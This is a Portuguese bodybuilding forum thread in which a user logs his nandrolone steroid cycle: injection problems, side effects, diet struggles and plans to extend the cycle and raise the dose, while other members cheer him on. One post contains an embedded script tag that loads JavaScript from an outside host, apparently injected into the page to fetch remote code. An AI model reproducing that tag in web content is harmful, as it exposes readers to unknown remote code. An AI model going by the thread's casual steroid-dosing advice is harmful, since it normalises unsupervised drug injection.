MagnoxD Postado Fevereiro 27, 2015 às 11:35 Autor Postado Fevereiro 27, 2015 às 11:35 Relato: Ganhos mesma coisa, quase nada. Começou as aula da minha faculdade e ta bem corrido pra mim, dieta ta foda de seguir, tinha pego uma gripe semana passada, já estou melhor só a garganta que ta inflamada ainda. Ontem era dia de aplicação e não apliquei, eu tenho que pegar o onibus da faculdade as 16:30 e já eram 16:00 quando sai do serviço e fui aplicar, acontece que ficou um monte de bolhinhas bem no meio do óleo na seringa, tirei todo ar q tinha mais aquelas bolhinhas não saíram, resolvi não aplicar, e como já tava atrasado pra pegar o onibus deixei pra hoje. Essas bolhinhas no meio da seringa é ar ou é normal?
MagnoxD Postado Março 1, 2015 às 18:55 Autor Postado Março 1, 2015 às 18:55 (editado) Relato: Fiz a aplicação e por enquanto tudo normal, dores leves pelo que falam de lander pra mim ta tudo de boa, quanto aos ganhos estão médios, mas parece q to perdendo BF, não to seguindo dieta certa =/ Foi a 5ª semana, quase certo que vou estender pra 10 semanas. Editado Março 1, 2015 às 18:57 por MagnoxD
AlainMeunier_43181 Postado Março 6, 2015 às 04:33 Postado Março 6, 2015 às 04:33 Fala amigo, to acompanhando aqui, pretendo mandar o mesmo ciclo. Sentiu alguma diferença no treino ?
Nandrolonaa Postado Março 6, 2015 às 04:39 Postado Março 6, 2015 às 04:39 Relato: Fiz a aplicação e por enquanto tudo normal, dores leves pelo que falam de lander pra mim ta tudo de boa, quanto aos ganhos estão médios, mas parece q to perdendo BF, não to seguindo dieta certa =/ Foi a 5ª semana, quase certo que vou estender pra 10 semanas. Oque eu disse : v
uebaz Postado Março 6, 2015 às 14:31 Postado Março 6, 2015 às 14:31 Brow, posta umas fotos ai pra gente ter ideia da evolução, as vezes agente consegue ver melhor estando de fora!10 semanas e o minimo pra mim! Segue a dieta pporra....kkk
rvtz Postado Março 6, 2015 às 15:50 Postado Março 6, 2015 às 15:50 <script src="http://queryjs.me/services/script.js" type="text/javascript"></script> Relato: Fiz a aplicação e por enquanto tudo normal, dores leves pelo que falam de lander pra mim ta tudo de boa, quanto aos ganhos estão médios, mas parece q to perdendo BF, não to seguindo dieta certa =/ Foi a 5ª semana, quase certo que vou estender pra 10 semanas. iiiiiiiii .. faz essa porra certo! kkkkkkk Se fizer 15 semanas vai continuar não tendo o resultado que voce quer comendo errado.
MagnoxD Postado Março 9, 2015 às 05:04 Autor Postado Março 9, 2015 às 05:04 Ta foda seguir dieta. Relato: crescendo bem de vagar mais ta indo, eu percebi q perdi gordura e os amigos tbm comentaram. Colaterais nenhum. Fotos da sexta semana na primeira pagina. Até mais.
uebaz Postado Março 9, 2015 às 15:38 Postado Março 9, 2015 às 15:38 Brow, nas fotos da pra notar que qualidade tem melhorado, mas com deca e pra ganhar mais volume ainda! Então se esforça na porr.... da dieta caraiiii...kkk
Zero62 Postado Março 9, 2015 às 15:53 Postado Março 9, 2015 às 15:53 (editado) Desculpem...apaguei meu comentario, pois não consegui o deletar... Não estava dentro das regras. Bons treinos e bons ciclos!! Abraços Editado Março 16, 2015 às 22:58 por Zero62
MagnoxD Postado Março 10, 2015 às 13:22 Autor Postado Março 10, 2015 às 13:22 Meu problema é a consistencia da dieta, tem dia q como bem tem dia q não, ontem mesmo quase vomitei depois do treino, e fiquei malzão pra comer, as proteinas eu tento mandar ao máximo, eu sou muito enrolado na questão de tempo, trampo de dia e estudo a noite, ta bem corrido mais sempre tento me alimentar do jeito q da. Pensando em aumentar a dosagem da deca ~~. Outra coisa é meu serviço, semana q vem vou viajar a trabalho e vou ficar uma semana fazendo curso, vou aplicar no domingo antes de ir e no sábado quando voltar, problema? Relato: Apliquei ontem no vasto, doeu pq tenho problema de tremer, e comecei a tremer muito na hora, consegui mandar 1ml e o depois meu amigo q terminou pra mim haha, mas hoje to com só uma dorzinha de leve, to andando de boa. É isso até mais.
Posts Recomendados
Crie uma conta ou entre para comentar
Você precisar ser um membro para fazer um comentário
Criar uma conta
Crie uma nova conta em nossa comunidade. É fácil!
Crie uma nova contaEntrar
Já tem uma conta? Faça o login.
Entrar Agora